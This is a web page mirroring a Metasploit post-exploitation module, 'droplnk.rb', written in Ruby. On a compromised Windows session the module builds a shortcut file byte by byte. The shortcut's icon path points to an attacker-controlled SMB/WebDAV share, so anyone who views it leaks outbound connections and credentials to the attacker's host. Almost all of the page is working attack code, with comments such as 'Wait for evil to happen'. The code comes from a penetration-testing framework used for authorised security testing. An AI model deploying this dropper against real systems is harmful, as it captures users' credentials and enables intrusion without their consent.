CoCalc -- droplnk.rb

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/post/windows/escalate/droplnk.rb
Views: ¹¹⁷⁸⁴

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Post
7

8
  def initialize(info = {})
9
    super(
10
      update_info(
11
        info,
12
        'Name' => 'Windows Escalate SMB Icon LNK Dropper',
13
        'Description' => %q{
14
          This module drops a shortcut (LNK file) that has a ICON reference
15
          existing on the specified remote host, causing SMB and WebDAV
16
          connections to be initiated from any user that views the shortcut.
17
        },
18
        'License' => MSF_LICENSE,
19
        'Author' => [ 'mubix' ],
20
        'Platform' => [ 'win' ],
21
        'SessionTypes' => [ 'meterpreter' ],
22
        'Compat' => {
23
          'Meterpreter' => {
24
            'Commands' => %w[
25
              core_channel_eof
26
              core_channel_open
27
              core_channel_read
28
              core_channel_write
29
              stdapi_fs_getwd
30
            ]
31
          }
32
        }
33
      )
34
    )
35
    register_options(
36
      [
37
        OptAddress.new('LHOST', [ true, 'Host listening for incoming SMB/WebDAV traffic', nil]),
38
        OptString.new('LNKFILENAME', [ true, "Shortcut's filename", 'Words.lnk']),
39
        OptString.new('SHARENAME', [ true, 'Share name on LHOST', 'share1']),
40
        OptString.new('ICONFILENAME', [ true, "File name on LHOST's share", 'icon.png'])
41
      ]
42
    )
43
  end
44

45
  def run
46
    print_status 'Creating evil LNK'
47
    lnk = ''
48
    lnk << "\x4c\x00\x00\x00"                  # Header size
49
    lnk << "\x01\x14\x02\x00\x00\x00\x00\x00"  # Link CLSID
50
    lnk << "\xc0\x00\x00\x00\x00\x00\x00\x46"
51
    lnk << "\xdb\x00\x00\x00"                  # Link flags
52
    lnk << "\x20\x00\x00\x00"                  # File attributes
53
    lnk << "\x30\xcd\x9a\x97\x40\xae\xcc\x01"  # Creation time
54
    lnk << "\x30\xcd\x9a\x97\x40\xae\xcc\x01"  # Access time
55
    lnk << "\x30\xcd\x9a\x97\x40\xae\xcc\x01"  # Write time
56
    lnk << "\x00\x00\x00\x00"                  # File size
57
    lnk << "\x00\x00\x00\x00"                  # Icon index
58
    lnk << "\x01\x00\x00\x00"                  # Show command
59
    lnk << "\x00\x00"                          # Hotkey
60
    lnk << "\x00\x00"                          # Reserved
61
    lnk << "\x00\x00\x00\x00"                  # Reserved
62
    lnk << "\x00\x00\x00\x00"                  # Reserved
63
    lnk << "\x7b\x00"                          # IDListSize
64
    # sIDList
65
    lnk << "\x14\x00\x1f\x50\xe0\x4f\xd0\x20"
66
    lnk << "\xea\x3a\x69\x10\xa2\xd8\x08\x00"
67
    lnk << "\x2b\x30\x30\x9d\x19\x00\x2f"
68
    lnk << 'C:\\'
69
    lnk << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
70
    lnk << "\x00\x00\x00\x4c\x00\x32\x00\x00\x00\x00\x00\x7d\x3f\x5b\x15\x20"
71
    lnk << "\x00"
72
    lnk << 'AUTOEXEC.BAT'
73
    lnk << "\x00\x00\x30\x00\x03\x00\x04\x00\xef\xbe\x7d\x3f\x5b\x15\x7d\x3f"
74
    lnk << "\x5b\x15\x14\x00\x00\x00"
75
    lnk << Rex::Text.to_unicode('AUTOEXEC.BAT')
76
    lnk << "\x00\x00\x1c\x00\x00\x00"
77
    # sLinkInfo
78
    lnk << "\x3e\x00\x00\x00\x1c\x00\x00\x00\x01\x00"
79
    lnk << "\x00\x00\x1c\x00\x00\x00\x2d\x00\x00\x00\x00\x00\x00\x00\x3d\x00"
80
    lnk << "\x00\x00\x11\x00\x00\x00\x03\x00\x00\x00\x3e\x77\xbf\xbc\x10\x00"
81
    lnk << "\x00\x00\x00"
82
    lnk << 'C:\\AUTOEXEC.BAT'
83
    lnk << "\x00\x00\x0e\x00"
84
    # RELATIVE_PATH
85
    lnk << Rex::Text.to_unicode('.\\AUTOEXEC.BAT')
86
    lnk << "\x03\x00"
87
    # WORKING_DIR
88
    lnk << Rex::Text.to_unicode('C:\\')
89
    # ICON LOCATION
90
    lnk << "\x1c\x00"
91
    lnk << Rex::Text.to_unicode("\\\\#{datastore['LHOST']}\\#{datastore['SHARENAME']}\\#{datastore['ICONFILENAME']}`")
92
    lnk << "\x00\x00\x03\x00\x00\xa0\x58\x00\x00\x00\x00\x00\x00\x00"
93
    lnk << 'computer'
94
    lnk << "\x00\x00\x00\x00\x00\x00\x26\x4e\x06\x19\xf2\xa9\x31\x40\x91\xf0"
95
    lnk << "\xab\x9f\xb6\xb1\x6c\x84\x22\x03\x57\x01\x5e\x1d\xe1\x11\xb9\x48"
96
    lnk << "\x08\x00\x27\x6f\xe3\x1f\x26\x4e\x06\x19\xf2\xa9\x31\x40\x91\xf0"
97
    lnk << "\xab\x9f\xb6\xb1\x6c\x84\x22\x03\x57\x01\x5e\x1d\xe1\x11\xb9\x48"
98
    lnk << "\x08\x00\x27\x6f\xe3\x1f\x00\x00\x00\x00"
99

100
    print_status "Done. Writing to disk - #{session.fs.dir.pwd}\\#{datastore['LNKFILENAME']}"
101
    file = client.fs.file.new(datastore['LNKFILENAME'], 'wb')
102
    file.write(lnk)
103
    file.close
104
    print_status 'Done. Wait for evil to happen..'
105
  end
106
end
107

108

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

Product

Resources

Company

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more, all in one place.

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.